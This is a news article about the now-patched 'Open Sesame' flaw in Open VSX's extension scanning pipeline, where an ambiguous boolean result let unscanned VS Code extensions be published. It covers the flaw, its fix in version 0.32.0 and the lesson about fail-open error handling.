Researchers have recently unveiled a significant security vulnerability within the Open VSX pre-publish scanning tool, which has since been addressed. This flaw previously enabled harmful Microsoft Visual Studio Code (VS Code) extensions to bypass security screenings and become publicly available in the registry. Koi Security’s Oran Simhony detailed in a report to The Hacker News that the issue arose from the scanning pipeline’s single boolean return value, which ambiguously indicated either no scanners were configured or all failed to execute.
Vulnerability Details and Impact
Last month, the Eclipse Foundation, responsible for Open VSX, announced new security checks for VS Code extensions to counteract the threat of malicious extensions. Open VSX serves as the marketplace for Cursor, Windsurf, and other VS Code variants, and the implementation of these checks was seen as a crucial step toward enhancing security. However, the flaw, dubbed ‘Open Sesame,’ allowed extensions to pass as successful even when scanner jobs encountered failures, rendering the extensions downloadable from Open VSX.
The flaw also highlighted issues with database connection pool exhaustion, preventing scanner jobs from queuing. Furthermore, a recovery service designed to retry failed scans suffered from the same misinterpretation, allowing extensions to bypass the scan entirely under certain conditions.
Exploitation and Mitigation
Exploiting this vulnerability did not require special access, as individuals with a free publisher account could exploit it to publish malicious extensions. By overwhelming the publish endpoint with .VSIX extensions, attackers could exhaust the database resources, causing scanning failures. The Eclipse Foundation addressed this issue in Open VSX version 0.32.0, following responsible disclosure on February 8, 2026.
Koi Security emphasized that while pre-publish scanning is vital, the problem lay in the pipeline design, where a single boolean was unable to differentiate between ‘no action required’ and ‘action failed,’ effectively compromising the infrastructure under stress.
Lessons and Future Outlook
The incident underscores a common software design flaw: fail-open error handling disguised as a legitimate ‘nothing to do’ scenario. Koi Security advises developers creating similar pipelines to explicitly define failure states to avoid conflating ‘no work needed’ with ‘work failed.’ This approach can prevent vulnerabilities from being exploited under pressure.
As industries increasingly rely on digital marketplaces, ensuring robust security measures is paramount. The prompt resolution of the Open VSX vulnerability serves as a reminder of the ongoing need for vigilance and proactive security practices in software development.
